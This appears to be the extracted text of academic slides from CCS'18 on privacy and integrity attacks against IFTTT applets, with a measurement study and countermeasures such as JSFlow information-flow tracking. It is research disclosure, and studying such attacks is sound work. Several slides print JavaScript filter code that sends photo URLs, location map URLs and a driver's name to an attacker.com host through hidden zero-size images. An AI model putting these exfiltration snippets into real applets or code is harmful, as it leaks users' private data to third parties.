Breaking and Fixing IoT Apps Andrei Sabelfeld Joint work with Iulia Bastys and Musard Balliu Appeared in CCS’18
Web of Things Internet of Things (IoT) • Incompatible standards, platforms, technologies “World Wide Web Consortium (W3C) is in a unique position to create the royalty-free and platform-independent standards needed to overcome the fragmentation of the IoT” -W3C CEO Dr. Jeff Jaffe, 2017 Security implications?
IoT apps “Connecting otherwise unconnected services”
IoT apps • “Managing users’ digital lives” • Smart homes, smartphones, cars, fitness armbands • Online services (Google, Dropbox,…) • Social networks (Facebook, Twitter,…) • End-user programming • Anyone can create and publish apps • Most apps by third parties • Web interface + smartphone clients
IFTTT “If This Then That” • Trigger-action programming • Largest IoT app platform • Over 500 integrated services • Millions of users and billions of running apps
IFTTT app If this then that Action Trigger What can go wrong? J
Attack by malicious app maker then If
IFTTT app If this then that Action Trigger What can go wrong? J
Attack by malicious app maker then If
IFTTT’s access control If this then that Action Trigger JavaScript Users explicitly “sandboxed” grant the app access
URLs as universal glue “Connecting otherwise unconnected services” If this then that Trigger Action 3. Pass URL to 1.Upload new Google Drive API image file to IFTTT for upload to Google 2. Put up image under public URL on ifttt.com
How to exfiltrate secrets? • Private information available via APIs • Private sources: Location, voice commands, images,… • Cannot directly exfiltrate from filter code • Public sinks? • Batch job programs with no I/O • “Can load the gun but not pull the trigger….”
URL attacks • “Load the gun and let somebody else pull the trigger” • URL upload attack • PhotoURL • 'https://attacker.com?'+encodeURIComponent(PhotoURL) • URL markup attack • Include an invisible image • ’<img src=\"https://attacker.com?’ + secret + '\" style=\"width:0px;height:0px;\">’
URL upload attack demo
URL markup attack demo
3 rd -party applet attack surface Integrity & then availability … If Privacy
Empirical measurement study • Dataset by Mi et al. (May 2017) • 279,828 IFTTT app data: triggers and actions used • Classification of triggers and actions • Privacy, Integrity & Availability • Per category • Classification of applets • Private sources & public sink potential privacy violation • High integrity sink potential integrity violation • Possibility of skipping trigger potential denial of service • 30% of apps potentially vulnerable
time management & tracking voice assistants task management & to-dos tags & beacons Private Available Public survey tools social networks smart hubs & systems security & monitoring systems power monitoring & management shopping photo & video noti fi cations news & information notes mobile devices & accessories music journaling & personal data location health & fi tness environment control & monitoring fi nance & payments email diy electronics IFTTT triggers developer tools contacts connected car communication calendars & scheduling cloud storage business tools bookmarking blogging appliances 200 150 100 50 0 Number of triggers per category
IFTTT actions Cumulative number of actions per category Public 180 Untrusted 160 Available 140 120 100 80 60 40 20 0 appliances blogging bookmarking business tools calendars & scheduling cloud storage communication connected car contacts developer tools diy electronics email environment control & monitoring gardening health & fi tness journaling & personal data lighting mobile devices & accessories music news & information notes noti fi cations pet trackers photo & video power monitoring & management routers & computer accessories security & monitoring systems shopping smart hubs & systems social networks survey tools task management & to-dos time management & tracking television & cable tags & beacons
1000 voice assistants Potential privacy violations time management & tracking task management & to-dos tags & beacons survey tools social networks smart hubs & systems 800 shopping security & monitoring systems routers & computer accessories power monitoring & management photo & video noti fi cations notes 600 news & information music mobile devices & accessories location lighting journaling & personal data health & fi tness fi nance & payments 400 environment control & monitoring email education diy electronics developer tools contacts connected car 200 communication cloud storage calendars & scheduling business tools bookmarking blogging appliances 0 appliances blogging bookmarking business tools calendars & scheduling cloud storage communication connected car contacts developer tools diy electronics education email environment control & monitoring fi nance & payments health & fi tness journaling & personal data lighting location mobile devices & accessories music news & information notes noti fi cations photo & video power monitoring & management routers & computer accessories security & monitoring systems shopping smart hubs & systems social networks survey tools tags & beacons task management & to-dos time management & tracking voice assistants
URL shortening attack demo
Countermeasures: break the flow • Per-app access control • Public app: no private sources • Private app: no public sinks • Cannot build URLs from strings, only via APIs • Output sanitization • Authenticated communication • Protect resources on CDNs by requiring authentication • If public URLs can’t be avoided • Shorten URL lifetime; already done by some CDNs • Secure URL shortening: 11-12 chars best practice
Public app then If
Private app then If
Countermeasures: track the flow • Track information flow in JavaScript code then • Allow flow from public sources If to attacker • Logo image with public URL JSFlow • Block flow from private sources to attacker • Location leaks prevented • JSFlow • Information flow tracker for JavaScript • ECMA-262 v.5 support • jsflow.net
Types of flow: explicit Automatically back up your new iOS photos to Google Drive APPLET TITLE Any new photo TRIGGER FILTER & TRANSFORM var publicPhotoURL = encodeURIComponent(IosPhotos.newPhotoInCameraRoll.PublicPhotoURL); var attack = ‘www.attacker.com?’ + publicPhotoURL; GoogleDrive.uploadFileFromUrlGoogleDrive.setUrl(attack); Upload file from URL ACTION 26
Types of flow: explicit Automatically back up your new iOS photos to Google Drive APPLET TITLE Any new photo TRIGGER FILTER & TRANSFORM var publicPhotoURL = encodeURIComponent(IosPhotos.newPhotoInCameraRoll.PublicPhotoURL); var attack = ‘www.attacker.com?’ + publicPhotoURL; GoogleDrive.uploadFileFromUrlGoogleDrive.setUrl(attack); Upload file from URL ACTION 27
Types of flow: explicit Automatically get an email every time you park your BMW with a map APPLET TITLE Car is parked TRIGGER FILTER & TRANSFORM var loc = encodeURIComponent(Location.enterOrExitRegionLocation.LocationMapUrl); var locImg = ‘<img src=\”’ + Location.enterOrExitRegionLocation.LocationMapUrl + ‘\”>’; var attack = ‘<img src=\”www.attacker.com?’ + loc + ‘\” style=\” width:0px; height:0px; \”>’; var iftttLogo = ‘<img src=\”www.ifttt.com/logo.png” style=\” width:100px; height:100px; \”>’; Email.sendMeEmail.setBody(‘I ‘ + Location.enterOrExitRegionLocation.EnteredOrExited + ‘ an area ’ + locImg + iftttLogo + attack); Send me an email ACTION 28
Types of flow: explicit Automatically get an email every time you park your BMW with a map APPLET TITLE Car is parked TRIGGER FILTER & TRANSFORM var loc = encodeURIComponent(Location.enterOrExitRegionLocation.LocationMapUrl); var locImg = ‘<img src=\”’ + Location.enterOrExitRegionLocation.LocationMapUrl + ‘\”>’; var attack = ‘<img src=\”www.attacker.com?’ + loc + ‘\” style=\” width:0px; height:0px; \”>’; var iftttLogo = ‘<img src=\”www.ifttt.com/logo.png” style=\” width:100px; height:100px; \”>’; Email.sendMeEmail.setBody(‘I ‘ + Location.enterOrExitRegionLocation.EnteredOrExited + ‘ an area ’ + locImg + iftttLogo + attack); Send me an email ACTION 29
Types of flow: implicit Log your completed rides in Google Calendar APPLET TITLE Ride completed TRIGGER FILTER & TRANSFORM var rideMap = Uber.rideCompleted.TripMapImage; var driver = Uber.rideCompleted.DriverName; for (i = 0; i < driver.length; i++) for (j = 32; j < 127; j++){ t = driver[i] == String.fromCharCode(j); if (t) { dst[i] = String.fromCharCode(j); } } var attack = ‘<img src=\”www.attacker.com?’ + dst + ‘\” style=\” width:0px; height:0px; \”>’; GoogleCalendar.quickAddEvent.setQuickAdd(rideMap + attack); Quick add event ACTION 30
Recommend
More recommend